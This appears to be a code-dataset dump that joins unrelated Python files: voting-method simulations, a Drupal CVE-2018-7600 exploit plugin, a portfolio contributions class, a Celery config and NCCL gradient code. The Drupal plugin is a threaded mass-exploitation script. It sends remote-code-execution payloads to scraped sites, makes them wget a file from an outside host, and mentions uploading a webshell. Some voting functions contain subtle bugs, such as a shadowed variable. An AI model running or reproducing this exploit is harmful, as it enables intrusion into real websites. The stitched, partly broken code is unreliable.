NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: single-seat, eliminations-only STV
result = self.simulate_stv(1, candidates, droop_quota=False,
randomize=randomize)
# Change name
result.voting_system = 'Instant-runoff voting (IRV)'
# Remove number of seats line
del result.details[0]
# Remove method line
del result.details[-1]
return result
def simulate_copeland(self, candidates, randomize=False):
"""Simulates Copeland's method voting.
Copeland's method is a Smith-efficient Condorcet method for single
seat elections. Voters rank the candidates in order of preference in
their ballots, and then candidates are ordered by the number of
pairwise victories, minus the number of pairwise defeats, according
to those ballots.
When there is no Condorcet winner, this method often leads to ties.
For example, if there is a three-candidate majority rule cycle, each
candidate will have exactly one loss, and there will be an unresolved
tie between the three.
In this implementation, the number of ranks of every ballot is set to
be a random number between 5 and 10, but never exceeding the number
of available candidates.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate ranked ballots for each voter group
ballots = self.generate_ranked_ballots(n, candidates, randomize)
# List all ranked candidates
ranked_candidates = []
for ranking, votes in ballots:
for candidate in ranking:
if candidate not in ranked_candidates:
ranked_candidates.append(candidate)
# Generate pairwise matchings
matchings = list(itls.combinations(ranked_candidates, 2))
# Get results of each pairwise matching
won = {c: 0 for c in ranked_candidates}
lost = {c: 0 for c in ranked_candidates}
for a, b in matchings:
votes = {a: 0, b: 0}
# Loop through each ballot
for ranking, votes in ballots:
# Check which candidate is preferred and increase its
# vote count. Ties are impossible.
if ranking.index(a) < ranking.index(b):
votes[a] += votes
else:
votes[b] += votes
# Update win/loss counts
if votes[a] > votes[b]:
won[a] += 1
lost[b] += 1
elif votes[a] < votes[b]:
won[b] += 1
lost[a] += 1
# The winner is the candidate with the highest win-loss score
win_loss = {c: won[c] - lost[c] for c in ranked_candidates}
winner = sort_dict_desc(win_loss)[0][0]
# Prepare result
name = 'Copeland\'s method'
details = [f'{len(candidates)} candidates',
f'{n} ranks per ballot']
result = ElectionResult(name, win_loss, [winner], count_type='Win-loss',
percent_column=False, details=details)
return result
def simulate_borda_count(self, candidates, variant='standard',
randomize=False):
"""Simulates Borda count voting.
The Borda count is a family of ranked voting systems for single seat
elections. Each voter ranks the candidates by order of preference and,
for each ballot, the candidates are given points according to their
rank position.
In the standard Borda count, if there are n candidates, the first
rank awards n points, the second n-1 points, and so on. A "zero-index"
version of the same scheme can be created by starting at n-1 points
for the first candidate. There's also a variant called Dowdall system,
where the first rank awards 1 point, the second 1/2 point, the third
1/3, and so on, making the scores independent from the number of
candidates.
This function implements all three variants: standard Borda count,
zero-index variant, and Dowdall system. The number of ranks of every
ballot is set to be a random number between 5 and 10, but never
exceeding the number of available candidates.
Args:
candidates: List of candidates.
variant: Variant of Borda count to use. Choices are 'standard',
'zero-index', or 'dowdall'.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate ranked ballots for each voter group
ballots = self.generate_ranked_ballots(n, candidates, randomize)
# Score the candidates in each ballot
scores = {c: 0 for c in candidates}
for ranking, votes in ballots:
for i, candidate in enumerate(ranking):
# Score must be multiplied by the amount of votes
score = votes
if variant == 'dowdall':
# Dowdal system: Score declines harmonically
# according to sequence position
score *= (1.0 / (i + 1))
else:
# Standard/zero-index: Score declines arithmetically
# according to sequence position
score *= n - i - 1 if variant == 'zero-index' else n - i
scores[candidate] += round(score)
# The winner is the candidate with the highest score
winner = sort_dict_desc(scores)[0][0]
# Prepare result
name = 'Borda count'
details = []
if variant == 'dowdall':
details.append('Dowdall system')
elif variant == 'zero_index':
details.append('Zero-index variant')
details.extend([f'{len(candidates)} candidates',
f'{n} ranks per ballot'])
if randomize:
details.append('Randomized ballot generation')
result = ElectionResult(name, scores, [winner], count_type='Score',
details=details)
return result
def simulate_bucklin_voting(self, candidates, randomize=False):
"""Simulates Bucklin voting.
Bucklin voting is a family of ranked voting systems for single seat
elections. In the standard process, each voter ranks the candidates
by order of preference and first choice votes are counted. If a
candidate has a majority, that candidate wins. Otherwise, second
choices are added to the first choices. If a candidate has a majority,
that candidate wins, or the process continues until a majority is
reached.
This function implements the standard Bucklin voting procedure. The
number of ranks of every ballot is set to be a random number between
5 and 10, but never exceeding the number of available candidates.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate ranked ballots for each voter group
ballots = self.generate_ranked_ballots(n, candidates, randomize)
# Count the votes on each round
total_votes = sum([v for r, v in ballots])
counts = {c: 0 for c in candidates}
while True:
# Loop through ballots
for ranking, votes in ballots:
# If there are no candidates left in the ranking, move on
if not ranking:
continue
# Add votes to remaining first choice
candidate = ranking[0]
counts[candidate] += votes
# Remove this choice from the ranking
del ranking[0]
# Check if a majority was reached
majority_reached = False
for candidate, votes in counts:
if votes > 0.5 * total_votes:
majority_reached = True
break
# If so, end the process
if majority_reached:
break
# The winner is the candidate with the most votes
winner = sort_dict_desc(counts)[0][0]
# Prepare result
name = 'Bucklin voting'
details = [f'{len(candidates)} candidates',
f'{n} ranks per ballot']
if randomize:
details.append('Randomized ballot generation')
result = ElectionResult(name, counts, [winner], details=details)
return result
def simulate_score_voting(self, candidates, min_score, max_score,
randomize=False):
"""Simulates score voting or range voting.
Score voting is a family of cardinal voting systems for single seat
elections. In the standard process, each voter gives each candidate a
score, the scores are then summed, and the winner is the one with the
highest total score.
In this implementation, the number of ranks of every ballot is set to
be a random number between 5 and 10, but never exceeding the number
of available candidates.
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
candidates: List of candidates
min_score: Minimum score of the range
max_score: Maximum score of the range
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
InvalidScoreRangeError: If the given minimum score is greater
than the maximum
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
if min_score > max_score:
raise InvalidScoreRangeError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate score ballots
ballots = self.generate_score_ballots(
n, candidates, min_score, max_score, randomize)
# Count the scores for each candidate
scores = {c: 0 for c in candidates}
for ballot, votes in ballots:
for candidate, score in ballot.items():
scores[candidate] += votes * score
# The winner is the candidate with the highest score
winner = sort_dict_desc(scores)[0][0]
# Prepare result
name = 'Score voting'
details = [f'Score range [{min_score}, {max_score}]',
f'{len(candidates)} candidates',
f'{n} ranks per ballot',
'Randomized selection']
result = ElectionResult(name, scores, [winner], count_type='Score',
percent_column=False, details=details)
return result
def simulate_cav(self, candidates, randomize=False):
"""Simulates combined approval voting or evaluative voting.
CAV is a type of score voting system for single seat elections,
where each voter may express approval (1), disapproval (0), or
indifference (-1) toward each candidate, then the scores are summed
and the winner is the most-approved candidate (highest score).
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
candidates: List of candidates
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: score voting with score range [-1, 1]
result = self.simulate_score_voting(
candidates, -1, 1, randomize=randomize)
# Change name
result.voting_system = 'Combined approval voting (CAV)'
# Change score range line
result.details[0] = 'Scores used: support (1), neutral (0), oppose (-1)'
return result
def simulate_approval_voting(self, candidates, randomize=False):
"""Simulates approval voting.
Approval voting is a type of score voting system for single seat
elections, where each voter may approve (1) or not (0) any number of
candidates, and the winner is the most-approved candidate.
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
candidates: List of candidates
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: score voting with score range [0, 1]
result = self.simulate_score_voting(
candidates, 0, 1, randomize=randomize)
# Change name
result.voting_system = 'Approval voting'
# Change results count type
result.count_type = 'Approvals'
# Change score range line
result.details[0] = 'Each approval counts as one point'
return result
def simulate_star_bloc_voting(self, seats, candidates, randomize=False):
"""Simulates score-then-automatic-runoff (STAR) bloc voting.
START bloc voting is an adaptation of the STAR voting system for
multiple seat elections. Each voter scores all the candidates on
a scale from 0 to 5. All the scores are added and the two highest
scoring candidates advance to an automatic runoff. The finalist who
was preferred by (scored higher by) more voters wins the first seat.
The next two highest scoring candidates then runoff, with the finalist
preferred by more voters winning the next seat. This process continues
until all positions are filled.
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
seats: Number of seats to be filled
candidates: List of candidates
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if seats < 1:
raise NoSeatsToFillError
if len(candidates) <= 1 or seats > len(candidates):
raise NotEnoughCandidatesError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate score ballots
ballots = self.generate_score_ballots(n, candidates, 0, 5, randomize)
# Count the scores for each candidate
scores = {c: 0 for c in candidates}
for ballot, votes in ballots:
for candidate, score in ballot:
scores[candidate] += votes * score
# Fill the seats
winners = []
while len(winners) < seats:
# Get remaining candidates
remaining = [(c, v) for c, v in sort_dict_desc(scores)
if c not in winners and v > 0]
# If the number of remaining candidates is equal to
# the number of seats, fill seats and stop the process
if len(remaining) == seats:
for candidate, votes in remaining:
winners.append(candidate)
break
# Automatic runoff with the two two candidates
a, b = [c for c, v in remaining[0:2]]
runoff = {a: 0, b: 0}
for ballot, votes in ballots:
# Get highest score of each candidate
max_a = max([s for c, s in ballot if c == a])
max_b = max([s for c, s in ballot if c == b])
# Compare highest scores
if max_a < max_b:
# Prefers candidate B
runoff[b] += votes
elif max_a > max_b:
# Prefers candidate B
runoff[a] += votes
# The candidate with the highest runoff score wins a seat
winner = sort_dict_desc(runoff)[0][0]
winners.append(winner)
# Prepare result
name = 'Score-then-automatic-runoff (STAR) bloc voting'
details = [f'{seats} seats',
f'{len(candidates)} candidates',
f'{n} ranks per ballot',
'Randomized selection']
result = ElectionResult(name, scores, winners, count_type='Score',
details=details)
return result
def simulate_star_voting(self, candidates, randomize=False):
"""Simulates score-then-automatic-runoff (STAR) voting.
START voting is a voting system for single seat elections that consists
of score voting and a virtual runoff. Each voter scores all the
candidates on a scale from 0 to 5. All the scores are added and the two
highest scoring candidates advance to an automatic runoff. The finalist
who was preferred by (scored higher by) more voters wins.
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
candidates: List of candidates
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: single-seat STAR bloc voting
result = self.simulate_star_bloc_voting(
1, candidates, randomize=randomize)
# Change name
result.voting_system = 'Score-then-automatic-runoff (STAR) voting'
# Remove number of seats line
del result.details[0]
return result
class NoSeatsToFillError(Exception):
    """Raised when an election is asked to fill fewer than one seat."""
    pass
class NotEnoughCandidatesError(Exception):
    """Raised when the candidate list is too short for the election."""
    pass
class InvalidScoreRangeError(Exception):
    """Raised when the minimum score is greater than the maximum score."""
    pass
| 0 | 50,550 | 92 |
e5ad78c5dfb9a7cf808d457ea96e8cdd1767fd83 | 7,073 | py | Python | plugins/drupalgeddonrce2.py | fakegit/google_explorer | 0b21b57ef6fb7b9182fb13d00508164d007b2d19 | [
"MIT"
] | 155 | 2016-09-11T00:43:07.000Z | 2018-05-02T06:36:43.000Z | plugins/drupalgeddonrce2.py | fakegit/google_explorer | 0b21b57ef6fb7b9182fb13d00508164d007b2d19 | [
"MIT"
] | 19 | 2016-09-12T14:39:17.000Z | 2018-04-24T00:47:01.000Z | plugins/drupalgeddonrce2.py | fakegit/google_explorer | 0b21b57ef6fb7b9182fb13d00508164d007b2d19 | [
"MIT"
] | 85 | 2016-09-10T20:01:48.000Z | 2018-05-16T15:01:28.000Z | from queue import Queue
from urllib.parse import urlparse
from threading import Thread
import requests
import threading
import re
import os
from requests import get
from requests import post
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
lock = threading.Lock()
if __name__ == '__main__':
main()
| 46.228758 | 139 | 0.405203 | from queue import Queue
from urllib.parse import urlparse
from threading import Thread
import requests
import threading
import re
import os
from requests import get
from requests import post
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
lock = threading.Lock()
class Drupal_CVE_2018_7600():
def __init__(self, filename):
self.filename = filename
self.urls = self.dp_cve()
@staticmethod
def banner():
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" Drupal(7/8) CVE 2018 7600 Checker - anarcoder at protonmail.com\n")
def remove_duplicate_targets(self):
results = [line.rstrip('\n') for line in open(self.filename)]
url_lists = []
for url in results:
try:
urlp = urlparse(url)
urlp = urlp.scheme + '://' + urlp.netloc
url_lists.append(urlp)
except Exception as e:
pass
url_lists = set(url_lists)
url_lists = list(url_lists)
return url_lists
def check_vuln(self, q):
while True:
#with lock:
url = q.get()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; '
'Linux x86_64; rv:41.0) Gecko/20100101 '
'Firefox/41.0'}
drupal8conf = {'getParams': '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax',
'payload': {'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]': 'wget https://raw.githubusercontent.com/devel369/php/master/hu3.html'},
'webshell': {'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]': 'wget https://raw.githubusercontent.com/devel369/php/master/hu3.html'}}
drupal7conf = {'getParams': {'q': 'user/password',
'name[#post_render][]': 'passthru',
'name[#markup]': 'id',
'name[#type]': 'markup'},
'postParams': {'form_id': 'user_pass',
'_triggering_element_name': 'name'}}
vulnFlag = 0
with open('drupalrce_sites.txt', 'a+') as f:
try:
print('[+] Trying rce for drupal 8.. {0}'.format(url))
req = post(url + drupal8conf['getParams'],
headers=headers, verify=False,
timeout=30, data=drupal8conf['payload'])
if req.status_code == 200:
print('[+] Post accepted, confirming page uploaded..')
req = get(url + '/hu3.html', headers=headers,
verify=False, timeout=30)
if 'It Works' in req.content.decode("utf-8"):
print('[+] \033[31mVulnerable!!\033[33m Drupal 8 -> {0}\033[39m'.format(url + '/hu3.html'))
print('[+] Uploading webshell uploader...')
req = post(url + drupal8conf['getParams'],
headers=headers, verify=False,
timeout=30,
data=drupal8conf['webshell'])
f.write(url + '/hu3.php' + '\n')
vulnFlag = 1
else:
print('[-] Not vulnerable for drupal 8..')
if vulnFlag == 0:
print('[+] Trying rce for drupal 7.. {0}'.format(url))
req = post(url, params=drupal7conf['getParams'],
data=drupal7conf['postParams'],
verify=False, timeout=30)
m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', req.text)
if m:
found = m.group(1)
get_params = {'q':'file/ajax/name/#value/' + found}
post_params = {'form_build_id': found}
req = post(url, data=post_params,
params=get_params, verify=False,
timeout=30)
if "uid=" in req.content.decode("utf-8"):
print('[+] \033[31mVulnerable!!\033[33m Drupal 7 {0}\033[39m'.format(url))
print('[+] \033[31m{0} {1}\033[39m'.format(str(req.content.decode("utf-8")).split('\n')[0],url))
f.write(url + ' -> Drupal 7 \n')
q.task_done()
except Exception as e:
print('[-] Exception - Not vulnerable\n')
q.task_done()
q.task_done()
def dp_cve(self):
self.banner()
# Removing duplicate targets
url_lists = self.remove_duplicate_targets()
print(len(url_lists))
# My Queue
q = Queue(maxsize=0)
# Number of threads
num_threads = 10
for url in url_lists:
q.put(url)
# My threads
print('[*] Starting evil threads =)...\n')
for i in range(num_threads):
worker = Thread(target=self.check_vuln, args=(q,))
worker.setDaemon(True)
worker.start()
q.join()
def main():
filename = 'results_google_search.txt'
Drupal_CVE_2018_7600(filename)
if __name__ == '__main__':
main()
| 7,243 | 161 | 46 |
37b0f78d2a093d2a9f348fbb7a08d7fc6097a6ad | 636 | py | Python | portfoliofinder/contributions/scheduled_contributions.py | asteffey/portfolio-finder | a0001975ce28d2b92552810f18715c1351fd1422 | [
"MIT"
] | null | null | null | portfoliofinder/contributions/scheduled_contributions.py | asteffey/portfolio-finder | a0001975ce28d2b92552810f18715c1351fd1422 | [
"MIT"
] | 9 | 2018-12-18T00:15:41.000Z | 2020-06-20T17:12:04.000Z | portfoliofinder/contributions/scheduled_contributions.py | apsteffey/portfolio-finder | fbb596a8bc908f20826d9592c94db3fc553b378b | [
"MIT"
] | 1 | 2020-10-20T08:40:57.000Z | 2020-10-20T08:40:57.000Z | from typing import Dict
from .contributions import Contributions
class ScheduledContributions(Contributions): # pylint: disable=too-few-public-methods
"""Contributions which occur at specific years in the life of the portfolio.
:param scheduled_contributions: contributions by year relative to inception of portfolio
"""
| 35.333333 | 92 | 0.756289 | from typing import Dict
from .contributions import Contributions
class ScheduledContributions(Contributions): # pylint: disable=too-few-public-methods
"""Contributions which occur at specific years in the life of the portfolio.
:param scheduled_contributions: contributions by year relative to inception of portfolio
"""
def __init__(self, scheduled_contributions: Dict[int, float]):
self.scheduled_contributions = scheduled_contributions
def get_contribution_for_year(self, year):
if year in self.scheduled_contributions:
return self.scheduled_contributions[year]
return 0
| 245 | 0 | 53 |
c11715dba5441ac66af6f1c555d1d86364de8536 | 939 | py | Python | src/sgk/celeryapp.py | mava-ar/sgk | cb8b3abf243b4614e6a45e4e2db5bb7cce94dee4 | [
"Apache-2.0"
] | null | null | null | src/sgk/celeryapp.py | mava-ar/sgk | cb8b3abf243b4614e6a45e4e2db5bb7cce94dee4 | [
"Apache-2.0"
] | 32 | 2016-05-09T19:37:08.000Z | 2022-01-13T01:00:52.000Z | src/sgk/celeryapp.py | mava-ar/sgk | cb8b3abf243b4614e6a45e4e2db5bb7cce94dee4 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
import os
from tenant_schemas_celery.app import CeleryApp
from django.conf import settings
from celery.schedules import crontab
# set the default Django settings module for the 'celery' program.
if os.path.isfile(os.path.join(os.path.abspath('.'), 'sgk', 'settings', 'local.py')):
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sgk.settings.local')
else:
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sgk.settings.production')
app = CeleryApp('sgk')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
# schedule for all environment
app.conf.beat_schedule = {
# 'send_sms_notifications': {
# 'task': 'send_sms_notifications',
# 'schedule': crontab(minute='0', hour='08') # Execute every day at 8:00 am
# },
}
| 32.37931 | 85 | 0.741214 | from __future__ import absolute_import
import os
from tenant_schemas_celery.app import CeleryApp
from django.conf import settings
from celery.schedules import crontab
# set the default Django settings module for the 'celery' program.
# Prefer the developer-local settings module when sgk/settings/local.py exists
# under the current working directory; otherwise fall back to production.
if os.path.isfile(os.path.join(os.path.abspath('.'), 'sgk', 'settings', 'local.py')):
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sgk.settings.local')
else:
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sgk.settings.production')

# Tenant-aware Celery application for the 'sgk' project.
app = CeleryApp('sgk')

# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)

# schedule for all environment
# (currently empty; the SMS-notification entry below is kept as a template)
app.conf.beat_schedule = {
    # 'send_sms_notifications': {
    #     'task': 'send_sms_notifications',
    #     'schedule': crontab(minute='0', hour='08')  # Execute every day at 8:00 am
    # },
}
| 0 | 0 | 0 |
f9018d542882a2b4348b7736cc1deaa344619663 | 9,971 | py | Python | hybridbackend/tensorflow/distribute/nccl.py | fuhailin/HybridBackend | 113383c5870b7180fa67c194208a27f76bdbf3f0 | [
"Apache-2.0"
] | 38 | 2021-12-01T06:54:36.000Z | 2022-03-23T11:23:21.000Z | hybridbackend/tensorflow/distribute/nccl.py | fuhailin/HybridBackend | 113383c5870b7180fa67c194208a27f76bdbf3f0 | [
"Apache-2.0"
] | 15 | 2021-12-01T09:15:26.000Z | 2022-03-28T02:49:21.000Z | hybridbackend/tensorflow/distribute/nccl.py | fuhailin/HybridBackend | 113383c5870b7180fa67c194208a27f76bdbf3f0 | [
"Apache-2.0"
] | 8 | 2021-12-02T01:16:14.000Z | 2022-01-28T04:51:16.000Z | # Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''NCCL based collective commmunication.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import tf_logging as logging
from hybridbackend.tensorflow.distribute.communicator import CollectiveOps
from hybridbackend.tensorflow.distribute.communicator import Communicator
from hybridbackend.tensorflow.distribute.pubsub import PubSub
from hybridbackend.tensorflow.pywrap import _ops
# Communicator bookkeeping ops produce no differentiable outputs.
ops.NotDifferentiable('GetNcclId')
ops.NotDifferentiable('NcclComm')
ops.NotDifferentiable('CreateNcclComm')
ops.NotDifferentiable('IsNcclCommInitialized')
@ops.RegisterGradient('ReduceWithNcclComm')
def _reduce_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL reduce op: broadcast the gradient back from the root.
  '''
  if op.get_attr('reduce_op') != CollectiveOps.SUM:
    raise NotImplementedError(
      'Only reduce_op=SUM is supported for gradients computation.')
  handle = op.inputs[0]
  dy = args[0]
  root = op.get_attr('root_rank')
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.broadcast_with_nccl_comm(handle, dy, root_rank=root)
  return None, dx
@ops.RegisterGradient('ReduceScatterWithNcclComm')
def _reduce_scatter_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL reduce scatter op: allgather the incoming gradient.
  '''
  if op.get_attr('reduce_op') != CollectiveOps.SUM:
    raise NotImplementedError(
      'Only reduce_op=SUM is supported for gradients computation.')
  handle, dy = op.inputs[0], args[0]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.allgather_with_nccl_comm(handle, dy)
  return None, dx
@ops.RegisterGradient('AllreduceWithNcclComm')
def _allreduce_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL allreduce op: another allreduce of the gradient.
  '''
  reduce_op = op.get_attr('reduce_op')
  if reduce_op != CollectiveOps.SUM:
    raise NotImplementedError(
      'Only reduce_op=SUM is supported for gradients computation.')
  handle, dy = op.inputs[0], args[0]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.allreduce_with_nccl_comm(handle, dy, reduce_op=reduce_op)
  return None, dx
# These rooted/uneven collectives are registered as non-differentiable.
ops.NotDifferentiable('BroadcastWithNcclComm')
ops.NotDifferentiable('ScatterWithNcclComm')
ops.NotDifferentiable('GatherWithNcclComm')
ops.NotDifferentiable('GathervWithNcclComm')
@ops.RegisterGradient('AllgatherWithNcclComm')
def _allgather_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL allgather op: reduce-scatter (SUM) of the gradient.
  '''
  handle, dy = op.inputs[0], args[0]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.reduce_scatter_with_nccl_comm(
        handle, dy, reduce_op=CollectiveOps.SUM)
  return None, dx
# Variable-length allgather is registered as non-differentiable.
ops.NotDifferentiable('AllgathervWithNcclComm')
@ops.RegisterGradient('AlltoallWithNcclComm')
def _alltoall_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL alltoall op: another alltoall of the gradient.
  '''
  handle, dy = op.inputs[0], args[0]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.alltoall_with_nccl_comm(
        handle, dy,
        wire_dtype=op.get_attr('wire_dtype'))
  return None, dx
@ops.RegisterGradient('AlltoallvWithNcclComm')
def _alltoallv_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL alltoallv op.

  The gradient of an alltoallv is another alltoallv of the incoming
  gradient, driven by the sizes emitted by the forward op
  (``op.outputs[1]``) so each rank sends back exactly what it received.
  '''
  # Renamed from _nccl_alltoallv_grad for consistency with the other
  # *_with_nccl_comm_grad functions in this module; the name is private
  # and only referenced through the RegisterGradient decorator.
  comm = op.inputs[0]
  grad_in = args[0]  # was list(args)[0]; args is already indexable
  grad_sizes_in = op.outputs[1]
  common_shape = op.get_attr('common_shape')
  wire_dtype = op.get_attr('wire_dtype')
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      grad_out, grad_sizes_out = _ops.alltoallv_with_nccl_comm(
        comm, grad_in, grad_sizes_in,
        wire_dtype=wire_dtype,
        common_shape=common_shape)
  return None, grad_out, grad_sizes_out
@ops.RegisterGradient('GroupAlltoallvWithNcclComm')
def _group_alltoallv_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL group_alltoallv op.
  '''
  handle = op.inputs[0]
  num_columns = op.get_attr('num_columns')
  # First num_columns entries of args are the per-column gradients; the
  # forward op's trailing outputs carry the sizes to route them back.
  dys = args[:num_columns]
  dy_sizes = op.outputs[num_columns:]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dxs, _ = _ops.group_alltoallv_with_nccl_comm(
        handle, dys, dy_sizes,
        wire_dtype=op.get_attr('wire_dtype'),
        common_shapes=op.get_attr('common_shapes'))
  # One None for the comm handle, then the gradients, then None per size input.
  return (None,) + tuple(dxs) + (None,) * num_columns
@ops.RegisterGradient('AlltoallwWithNcclComm')
def _alltoallw_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL alltoallw op: alltoallw of the incoming gradients.
  '''
  handle = op.inputs[0]
  dys = list(args)
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dxs = _ops.alltoallw_with_nccl_comm(
        handle, dys,
        wire_dtype=op.get_attr('wire_dtype'),
        common_shape=op.get_attr('common_shape'))
  return [None] + dxs
@ops.RegisterGradient('GroupAlltoallwWithNcclComm')
def _group_alltoallw_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL group_alltoallw op.
  '''
  handle = op.inputs[0]
  dys = list(args)
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dxs = _ops.group_alltoallw_with_nccl_comm(
        handle, dys,
        num_columns=op.get_attr('num_columns'),
        wire_dtype=op.get_attr('wire_dtype'),
        common_shapes=op.get_attr('common_shapes'))
  return [None] + dxs
class NcclCommunicator(Communicator):
r'''A communicator using NCCL.
'''
NAME = 'NCCL'
@classmethod
Communicator.register(NcclCommunicator)
| 31.454259 | 79 | 0.726407 | # Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''NCCL based collective commmunication.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import tf_logging as logging
from hybridbackend.tensorflow.distribute.communicator import CollectiveOps
from hybridbackend.tensorflow.distribute.communicator import Communicator
from hybridbackend.tensorflow.distribute.pubsub import PubSub
from hybridbackend.tensorflow.pywrap import _ops
# Communicator bookkeeping ops produce no differentiable outputs.
ops.NotDifferentiable('GetNcclId')
ops.NotDifferentiable('NcclComm')
ops.NotDifferentiable('CreateNcclComm')
ops.NotDifferentiable('IsNcclCommInitialized')
